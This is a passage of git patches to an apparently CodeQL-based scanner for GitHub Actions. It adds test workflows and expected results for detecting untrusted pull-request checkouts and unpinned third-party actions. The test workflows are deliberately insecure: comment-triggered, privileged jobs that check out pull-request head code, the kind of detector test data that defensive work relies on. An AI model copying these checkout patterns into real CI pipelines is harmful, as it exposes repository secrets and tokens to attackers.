"pull_request_review", "workflow_run", "check_run", "check_suite", "workflow_call"]) and + w.hasTriggerEvent([ + "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", + "workflow_run", "check_run", "check_suite", "workflow_call" + ]) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml new file mode 100644 index 000000000000..4de47d6f17a0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -0,0 +1,53 @@ +name: PR head from 3rd party action + +on: + workflow_call: + workflow_dispatch: + +jobs: + + test1: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + test2: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + test3: + runs-on: ubuntu-20.04 + steps: + - name: resolve pr refs + id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_ref }} + fetch-depth: 0 + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_sha }} + fetch-depth: 0 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml new file mode 100644 index 000000000000..ece4c02c3565 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml @@ -0,0 +1,46 @@ +name: Direct access + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + if: github.event_name == 'issue_comment' && github.event.issue.pull_request + steps: + - name: Unsafe Code Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch + test2: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: refs/pull/${{ github.event.issue.number }}/merge + + test3: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} + + test4: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} + + test5: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml new file mode 100644 index 000000000000..8c0865f598cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml @@ -0,0 +1,50 @@ +name: Heuristic based + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test2: + runs-on: ubuntu-latest + + steps: + - name: Detect branch for PR + id: vars + run: | + PR=$( echo "${{ github.event.comment.issue_url }}" | grep -oE 'issues/([0-9]+)$' | cut -d'/' -f 2 ) + PR_INFO=$( curl \ + --request GET \ + --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \ + --header 'content-type: application/json' \ + --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR ) + REF=$(echo "${PR_INFO}" | jq -r .head.ref) + echo "branch=$REF" >> $GITHUB_OUTPUT + - uses: actions/checkout@v4 + with: + ref: ${{ steps.vars.outputs.branch }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml new file mode 100644 index 000000000000..1245d0302fb4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -0,0 +1,114 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR + uses: octokit/request-action@v2.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} + token: ${{ secrets.GITHUB_TOKEN }} + + test2: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test3: + if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v4 + with: + result-encoding: string + script: | + const { owner, repo, number } = context.issue; + const pr = await github.pulls.get({ + owner, + repo, + pull_number: number, + }); + return pr.data.head.sha + - uses: actions/checkout@v2 + with: + ref: ${{ steps.sha.outputs.result }} + + test4: + if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v6 + with: + result-encoding: string + script: | + const response = await github.request(context.payload.issue.pull_request.url); + return response.data.head.sha; + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.sha.outputs.result }} + + test5: + runs-on: ubuntu-20.04 + steps: + - id: request + uses: octokit/request-action@v2.0.2 + with: + route: ${{ github.event.issue.pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 67fcc5555d16..48b7b762605c 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -3,6 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index be1c7cbfebdb..c7f4e4ad1c20 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1,4 +1,13 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 22d0600da8d8a58fba75ca358b7e439111af5441 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 13:28:39 +0100 Subject: [PATCH 107/707] Support more PR head checkouts --- ql/lib/codeql/actions/Ast.qll | 4 +++- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 9 +++++++++ .../Security/CWE-829/UntrustedCheckout.expected | 8 ++++++++ 4 files changed, 22 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 70424a46f95b..4a7ff12b4f96 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -232,7 +232,9 @@ abstract class SimpleReferenceExpression extends AstNode instanceof SimpleRefere AstNode getTarget() { result = super.getTarget() } } -class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { } +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { + string getStepId() { result = super.getStepId() } +} class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 084474b40204..5c6ce37fa928 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -858,6 +858,8 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { this.getEnclosingJob() = result.getEnclosingJob() and result.(StepImpl).getId() = stepId } + + string getStepId() { result = stepId } } /** diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index a24c80a2f607..f12f11020875 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -66,6 +66,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", + "\\bhead\\.sha\\b", "\\bhead\\.ref\\b" ], _, _) ) } @@ -80,6 +81,14 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ( containsHeadRef(this.getArgumentExpr("ref").getExpression()) or + exists(StepsExpression e | + this.getArgumentExpr("ref") = e and + ( + e.getStepId().matches(["%sha%", "%head%", "branch"]) or + e.getFieldName().matches(["%sha%", "%head%", "branch"]) + ) + ) + or exists(UsesStep head | head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index c7f4e4ad1c20..a6f02e7752a2 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -10,4 +10,12 @@ | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 778d8978b05267a6b1eed1df7d5e03cb8ea9f8a7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 13:55:10 +0100 Subject: [PATCH 108/707] DF support for untrusted checkout query --- .../dataflow/internal/DataFlowPublic.qll | 1 + ql/src/Security/CWE-829/UntrustedCheckout.ql | 18 ++++++++----- .../issue_comment_3rd_party_action.yml | 1 - .../.github/workflows/untrusted_checkout.yml | 26 ++++++------------- .../CWE-829/UnpinnedActionsTag.expected | 8 +++--- .../CWE-829/UntrustedCheckout.expected | 11 ++++---- 6 files changed, 30 insertions(+), 35 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 8e8ed5d92802..681d6f1cfc39 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -176,6 +176,7 @@ class FieldContent extends Content, TFieldContent { } predicate hasLocalFlow(Node n1, Node n2) { + n1 = n2 or simpleLocalFlowStep(n1, n2) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index f12f11020875..1be8a6ea0f5d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -79,8 +79,19 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { ActionsCheckout() { this.getCallee() = "actions/checkout" and ( - containsHeadRef(this.getArgumentExpr("ref").getExpression()) + // ref argument contains the head ref + exists(Expression e | + containsHeadRef(e.getExpression()) and + DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref")) + ) + or + // 3rd party actions returning the PR head sha/ref + exists(UsesStep head | + head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) + ) or + // heuristic base on the step id and field name exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( @@ -88,11 +99,6 @@ class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { e.getFieldName().matches(["%sha%", "%head%", "branch"]) ) ) - or - exists(UsesStep head | - head.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - DataFlow::hasLocalFlowExpr(head, this.getArgumentExpr("ref")) - ) ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 4de47d6f17a0..221854ec2042 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -13,7 +13,6 @@ jobs: if: ${{ github.event_name == 'issue_comment' }} uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} uses: actions/checkout@v3 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index a37ceb8f9f65..6bcdcbb4291c 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -3,23 +3,13 @@ on: jobs: build: - name: Build and test runs-on: ubuntu-latest + env: + HEAD: ${{ github.event.pull_request.head.sha }} steps: - - uses: actions/checkout@v2 - with: - ref: ${{ github.event.pull_request.head.sha }} - - - uses: actions/setup-node@v1 - - run: | - npm install - npm build - - - uses: completely/fakeaction@v2 - with: - arg1: ${{ secrets.supersecret }} - - - uses: fakerepo/comment-on-pr@v1 - with: - message: | - Thank you! + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 48b7b762605c..c3a3ec2f988c 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -3,14 +3,12 @@ | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:17:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:26:9:31:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:40:9:46:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index a6f02e7752a2..cf9d6c01d49c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -1,10 +1,10 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| 